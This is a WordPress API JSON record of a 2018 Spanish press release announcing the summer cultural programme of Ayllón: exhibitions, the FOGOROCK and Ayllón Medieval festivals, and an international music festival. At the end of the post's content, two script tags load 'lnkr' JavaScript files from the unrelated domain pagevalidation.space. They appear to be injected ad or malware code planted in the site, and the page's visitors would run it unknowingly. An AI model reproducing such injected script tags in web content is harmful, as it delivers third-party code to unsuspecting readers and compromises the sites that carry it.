{"id":209,"date":"2018-07-13T11:35:34","date_gmt":"2018-07-13T11:35:34","guid":{"rendered":"http:\/\/www.bandopress.com\/notas-de-prensa\/?p=209"},"modified":"2018-07-13T11:35:34","modified_gmt":"2018-07-13T11:35:34","slug":"el-verano-cultural-de-ayllon-comienza-su-andadura","status":"publish","type":"post","link":"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/13\/el-verano-cultural-de-ayllon-comienza-su-andadura\/","title":{"rendered":"El verano cultural de Ayll\u00f3n comienza su andadura"},"content":{"rendered":"<p><strong>M\u00fasica, exposiciones, teatro y deportes son algunas de las iniciativas que se han programado para un verano lleno de emoci\u00f3n<\/strong><\/p>\n<p><span id=\"fcuerpo\">Se presenta el nuevo programa de verano que se desarrollar\u00e1 durante los meses de julio, agosto y septiembre en la villa de Ayll\u00f3n.<\/p>\n<p>Durante todo el verano, la Villa de Ayll\u00f3n se llena de actividades para todo tipo de p\u00fablicos y aficiones. Desde la presentaci\u00f3n del nuevo libro de Jos\u00e9 Luis Gutierrez UNA BICICLETA VOLADORA, hasta el cierre de las actividades con la XVI Marcha Cicloturista Sierra de Ayll\u00f3n.<br \/>\nPor la Villa pasar\u00e1n cinco exposiciones de fotograf\u00eda, pintura y escultura que se presentar\u00e1n en la Iglesia de San Miguel.<br \/>\nDos grandes festivales acompa\u00f1an al Municipio en estos meses, FOGOROCK, el 27 de julio, como festival de rock benjam\u00edn, ya que esta es su primera edici\u00f3n, refleja la juventud, frescura y energ\u00eda de las nuevas generaciones, y seguidamente, la emblem\u00e1tica fiesta de AYLL\u00d3N MEDIEVAL que lleva a sus espaldas veintiuna ediciones, y refleja el movimiento asociativo y el trabajo en equipo a\u00f1o a a\u00f1o.<br \/>\nMultiples actividades deportivas se desarrollan alrededor de las instalaciones de la Piscina Municipal, iniciativas llevadas a cabo por los gestores de dichas instalaciones y a finales del mes de agosto, del 18 al 26 de agosto se desarrollar\u00e1 el FESTIVAL DE M\u00daSICA INTERNACIONAL, en la Iglesia de San Miguel, con m\u00fasicos de la relevancia del Cuarteto Leonor, el flautista Antonio Arias o la Contrabajo Ana C\u00f3rdova.<br \/>\nComo plato fuerte del verano, la exposici\u00f3n que todos los a\u00f1os se desarrolla en el interior de la Iglesia de San Miguel de la BECA DE BELLAS ARTES en la que colabora la Universidad Complutense de Madrid y en la que trabajan cuatro pintores y cuatro escultores durante todo el mes de agosto.<\/p>\n<p>Se adjunta el programa de verano en PDF para una informaci\u00f3n m\u00e1s completa.<\/span><\/p>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>M\u00fasica, exposiciones, teatro y deportes son algunas de las iniciativas que se han programado para un verano lleno de emoci\u00f3n Se presenta el nuevo programa <a class=\"mh-excerpt-more\" href=\"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/13\/el-verano-cultural-de-ayllon-comienza-su-andadura\/\" title=\"El verano cultural de Ayll\u00f3n comienza su andadura\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":210,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-209","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-segovia"],"_links":{"self":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/209","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/comments?post=209"}],"version-history":[{"count":1,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/209\/revisions"}],"predecessor-version":[{"id":211,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/209\/revisions\/211"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media\/210"}],"wp:attachment":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media?parent=209"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/categories?post=209"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/tags?post=209"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}